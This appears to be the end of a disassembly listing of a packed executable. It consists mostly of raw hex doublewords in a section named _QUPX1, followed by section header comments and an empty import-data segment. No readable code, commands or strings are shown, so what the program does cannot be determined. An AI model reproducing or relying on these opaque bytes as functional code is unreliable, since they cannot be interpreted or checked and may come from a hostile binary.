dd 3268F78Bh, 55D0B2FEh, 0DBE3DB9Bh, 0DBFF2404h, 0DE042444h
dd 7F1CDBC1h, 241C8B24h, 0C351AD66h, 8DDAE7D0h, 0CCD0B266h
dd 29E1D1D0h, 33240CFFh, 0E9D12404h, 58ABFF66h, 0B96614E2h
dd 2BFF4FFCh, 33E7FFF9h, 0EF2C8BC9h, 6ED8124h, 0FFC3D0B2h
dd 53E0BEE3h, 41454841h, 64506844h, 7772B7h, 7325A154h
dd 0FB5CD392h, 0D18C7325h, 736F5F00h, 68317100h, 0A8455E50h
dd 19930582h, 53005DE0h, 73ED63EDh, 93ED83EDh, 0B3EDA3EDh
dd 0EDC3EDh, 0EDE3EDD3h, 0FD03EDF3h, 0FD23FD13h, 0FD43FD33h
dd 63FD5300h, 83FD73FDh, 0A3FD93FDh, 0C3FDB3FDh, 0FDD300FDh
dd 0FDF3FDE3h, 0D130D03h, 0D330D23h, 53000D43h, 730D630Dh
dd 930D830Dh, 0B30DA30Dh, 0DC30Dh, 0DE30DD3h, 1D030DF3h
dd 1D231D13h, 1D431D33h, 631D5300h, 831D731Dh, 0A31D931Dh
dd 0C31DB31Dh, 1DD3E81Dh, 804B1AE1h, 0A450785Ch, 30FFB230h
dd 30BF30B8h, 0FFE630D4h, 0F830F030h, 9310330h, 311031FFh
dd 31423137h, 4F31FF48h, 82317731h, 31FF8831h, 31B6318Fh
dd 0FFE231BBh, 0BA32B531h, 0D232C432h, 32D732FFh, 3384335Dh
dd 0A033FF8Eh, 0C733AA33h, 33FFD433h, 33EB33DFh, 0FF17340Ah
dd 3E342D34h, 66344834h, 346B34FFh, 34DF34A5h, 1834FFF4h
dd 46352535h, 35FF5F35h, 35BD357Eh, 0FFF135CAh, 7C361D35h
dd 0FC368936h, 370B36FFh, 371C3711h, 3637FF2Ch, 8B378637h
dd 38FF0B37h, 383E3817h, 0FF793861h, 0B938A138h, 0F438CC38h
dd 390438FFh, 39A2399Ch, 0B639FFAFh, 0C939BD39h, 39FFD739h
dd 39E539DEh, 0FF1D3A10h, 333A253Ah, 403A393Ah, 3A523AFFh
dd 3A673A5Fh, 7B3AFF75h, 0EF3A823Ah, 3AFFF63Ah, 3B013AFBh
dd 0FF353B1Ch, 6C3B3C3Bh, 7D3B763Bh, 3B853BFFh, 3B9B3B90h
dd 0A83BFFA1h, 0DB3BD63Bh, 3CFF643Bh, 3CB73CAAh, 0FFCC3CC7h
dd 0FE3CD43Ch, 493D0D3Ch, 3D5E3DFFh, 3DC93DAAh, 0D43DFFCEh
dd 0EF3DE83Dh, 3DFFF43Dh, 3E073DFAh, 0FF3C3E25h, 4E3E483Eh
dd 673E543Eh, 3E793EFFh, 3EBA3E86h, 0EA3EFFD3h, 0FA3EF43Eh
dd 3FFF083Eh, 3F133F0Dh, 0FF1F3F19h, 2D3F273Fh, 3B3F333Fh
dd 3F443FFFh, 3F583F4Ch, 6A3FFF64h, 8B3F703Fh, 3FFF933Fh
dd 3FB63FAEh, 7FE93FD5h, 0F93FF33Fh, 0A93FFF3Fh, 0F781h
dd 5B0392Ch, 0FF300B30h, 3027301Dh, 303F3031h, 5B3044FFh
dd 66306030h, 306BFF30h, 30773071h, 9AFF3086h, 0E330C530h
dd 0FD30FE30h, 48200B0Ah, 83315631h, 3196FF31h, 31C231ACh
dd 10FF3202h, 44323E32h, 0FF325132h, 32623257h, 327E326Ah
dd 943289FFh, 0BF32A432h, 32CAFF32h, 32E232D0h, 0FAFF32E8h
dd 16330032h, 0FF332333h, 3335332Fh, 3343333Dh, 67335CFFh
dd 74336D33h, 3385FF33h, 3391338Ah, 0A5FF339Fh, 0BA33AF33h
dd 0FF33C333h, 33E233D7h, 33ED33E7h, 1533F6FFh, 30342034h
dd 3438FF34h, 3445343Fh, 517F344Bh, 60345734h, 204B6534h
dd 773471FFh, 88347E34h, 3496FF34h, 34AB349Dh, 0C4FF34B6h
dd 0CF34C934h, 0FF34D734h, 34E934DDh, 34FF34F5h, 0C3505FFh
dd 18351235h, 351EFF35h, 3538352Fh, 49FF3541h, 59354F35h
dd 0FF356835h, 3589357Fh, 359F358Fh, 0B935B0FFh, 0EC35C535h
dd 3601FF35h, 3621360Ah, 32FF362Ch, 70363B36h, 0FF368736h
dd 36973691h, 36AC369Dh, 0BD36B6FFh, 0DD36C636h, 36E8FF36h
dd 36F836F2h, 14FF3705h, 3A372B37h, 0FF374637h, 3753374Ch
dd 375E3758h, 7A376DFFh, 97378C37h, 379DFF37h, 37C637BBh
dd 0CFF37FEh, 3D383738h, 0FF384738h, 3853384Ch, 38603859h
dd 8238757Fh, 0AB389E38h, 5FF2085h, 26390C39h, 0FF392C39h
dd 39373931h, 394B3946h, 83396E7Fh, 97398D39h, 0B0FF228Dh
dd 0BB39B539h, 0FF39C039h, 39CB39C5h, 39E739DDh, 0FA39F47Fh
dd 183A1239h, 23FF20A1h, 2E3A283Ah, 0FF3A363Ah, 3A413A3Bh
dd 3A4C3A46h, 623A5BFFh, 6F3A683Ah, 3A78FF3Ah, 3A853A7Fh
dd 9BFF3A8Ch, 0A63AA13Ah, 0FF3AAD3Ah, 3ABD3AB8h, 3AC83AC3h
dd 0D33ACD7Fh, 0E93AE23Ah, 0FFFF22B7h, 0C3B063Ah, 0FF3B133Bh
dd 3B3F3B39h, 3B683B5Ah, 883B7FFFh, 983B8F3Bh, 3BA2FF3Bh
dd 3BBF3BB9h, 0DFFF3BD1h, 0EF3BE83Bh, 0FF3BF43Bh, 3C153BFAh
dd 3C2C3C1Bh, 623C31FFh, 703C683Ch, 3C9EFF3Ch, 3CE93CDCh
dd 3FF3CF6h, 1E3D173Dh, 0FF3D4D3Dh, 3DAB3D7Ch, 3DFC3DE3h
dd 283E12FFh, 4B3E463Eh, 3E6FFF3Eh, 3F5D3EFCh, 0CB9F3FBDh
dd 0D93FD23Fh, 0A0BA3149h, 10F5FE90h, 301B3016h, 0FFBE3046h
dd 1430DA30h, 4D312931h, 315A31FFh, 31723167h, 6633EF41h
dd 30CF6B33h, 0FF0B3406h, 29347634h, 7A355D35h, 358E35FFh
dd 35B735A9h, 0DF35FBCBh, 35F94039h, 0EF4B363Eh, 6F365836h
dd 36AB404Dh, 1B37FF0Eh, 40372437h, 37FF4737h, 37BA37A7h
dd 0BE2A3824h, 383C4085h, 7F563843h, 38FF6620h, 3876386Bh
dd 0FF81387Bh, 91388C38h, 0A2389738h, 38A738FFh, 38B738ACh
dd 0C238FFBCh, 0D238CD38h, 38FFD838h, 38E838E3h, 0FFF838EDh
dd 238FD38h, 13390A39h, 391939BFh, 0A732392Dh, 39FF3E40h
dd 39A3396Ah, 0FEB739B1h, 39E440C1h, 3A733A5Eh, 9F3AEF79h
dd 5009AB3Ah, 0FF163AFFh, 3E3B1B3Bh, 4A3B443Bh, 3B5E3BFFh
dd 3B773B64h, 823BFF7Ch, 993B8D3Bh, 3BFFA63Bh, 3C123BBEh
dd 0FE4F3C26h, 3CB65043h, 3CC13CBCh, 20E1EEC6h, 49D73CD1h
dd 0F23CE150h, 3CF83CFFh, 3D2D3D20h, 4F3DFF45h, 743D6D3Dh
dd 3DFF843Dh, 3D963D90h, 0FFA23D9Ch, 0AF3DA83Dh, 0BB3DB53Dh
dd 3DC13DFFh, 3DCC3DC6h, 0E63DFFDBh, 0F13DEB3Dh, 3DFFFE3Dh
dd 3E083E03h, 0FB133E0Eh, 5061193Eh, 3E383E33h, 5065FE3Eh
dd 3E713E6Bh, 0FF8C3E77h, 993E933Eh, 0C23EA13Eh, 3EC83EFFh
dd 3ED23ECDh, 0DD3EFFD7h, 0EB3EE53Eh, 3EFFF03Eh, 3F0A3EF7h
dd 0FE1A3F15h, 3F2A3021h
dd 3F353F2Fh, 453FFF40h, 543F4B3Fh, 3FFF5D3Fh, 3F7C3F66h
dd 0BF9C3F94h, 0C23FBA3Fh, 5071CD3Fh, 0E53FBFD8h, 0F23FEC3Fh
dd 0F7403345h, 0F51C0000h, 12300710h, 5717F530h, 305B2A30h
dd 303E3037h, 633056F7h, 30763067h, 81D7307Bh, 306F9330h
dd 0C210FBA8h, 30C7FF30h, 30D530CDh, 0E9F730DCh, 2007F930h
dd 310E3108h, 1E311757h, 0D2F508Bh, 200F3C20h, 54314CFFh
dd 6B316631h, 319AFF31h, 31AF31A1h, 9FF31E8h, 1F321432h
dd 0DF322A32h, 3235322Fh, 56308F3Dh, 325CFF32h, 326B3265h
dd 78FF3271h, 87327D32h, 0FF329132h, 329C3296h, 32A632A1h
dd 0B232ACFFh, 0BE32B832h, 32CEFF32h, 32DD32D6h, 0EAF732E3h
dd 30A9F032h, 330D3306h, 1B3314FFh, 2A332133h, 3333FF33h
dd 33423339h, 64FD3349h, 340E30C9h, 34313428h, 803568DFh
dd 402F8735h, 98F73594h, 40379C35h, 360535EBh, 10360CFFh
dd 18361436h, 361CFF36h, 36243620h, 72F73628h, 20657836h
dd 36843680h, 0F536EA7Fh, 17371036h, 20DD206Fh, 374150C7h
dd 0A4407B6Bh, 37A8FF37h, 37B037ACh, 0B8FF37B4h, 0C037BC37h
dd 7F380A37h, 38143810h, 0EF1C3818h, 0C0BCFA50h, 527750h
dd 3120311Ch, 30312CD7h, 55407051h, 0FF315070h, 3160315Ch
dd 3170316Ch, 80317CFFh, 90318C31h, 319CF731h, 0B03083A0h
dd 0F7600031h, 0F5380000h, 4300010h, 3008FF30h, 3010300Ch
dd 18FF3014h, 20301C30h, 0FF302430h, 302C3028h, 30343030h
dd 3C3038DFh, 305F4030h, 4CFF3048h, 54305030h, 0FD305830h
dd 6430635Ch, 6C306830h, 3070FF30h, 30783074h, 80FF307Ch
dd 88308430h, 0FF308C30h, 30943090h, 309C3098h, 0A430A0F7h
dd 30AC702Fh, 0B4FD30B0h, 30BC10FBh, 30C430C0h, 0CC30C85Fh
dd 10FFD030h, 7F703BD8h, 30E430E0h, 3EC30E8h, 5F47D20h
dd 30FC20h, 70430431h, 200B0CBDh, 31183114h, 0BB24812Ch
dd 822F2831h, 33383134h, 11DC4482h, 54813820h, 823B5831h
dd 685D3164h, 3174823Fh, 84824378h, 48EE2019h, 98319481h
dd 31A4824Bh, 824FFEA8h, 31B831B4h, 0FFC031BCh, 0C831C431h
dd 0D031CC31h, 31D431FFh, 31DC31D8h, 0E431FBE0h, 31EC7063h
dd 0FFF431F0h, 0FC31F831h, 4320031h, 320832EFh, 1430890Ch
dd 32FB1832h, 24D05C1Ch, 2C322832h, 323032FFh, 32383234h
dd 4032FB3Ch, 3248308Dh, 0F50324Ch, 58325432h, 9D8DB2CBh
dd 9DAD9D9Dh, 0CD9DBD00h, 0ED9DDD9Dh, 0D9DFD9Dh, 2DAD1DADh
dd 0AD3D00ADh, 0AD5DAD4Dh, 0AD7DAD6Dh, 0AD9DAD8Dh, 0BD00ADADh
dd 0DDADCDADh, 0FDADEDADh, 1DBD0DADh, 0BD2DBDh, 0BD4DBD3Dh
dd 0BD6DBD5Dh, 0BD8DBD7Dh, 0BDADBD9Dh, 0CDBDBD18h, 0BDDDBDh
dd 4F2h dup(0)
_QUPX1 ends
; Section 6. (virtual address 0000F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3130F000h
align 2000h
_idata2 ends
end start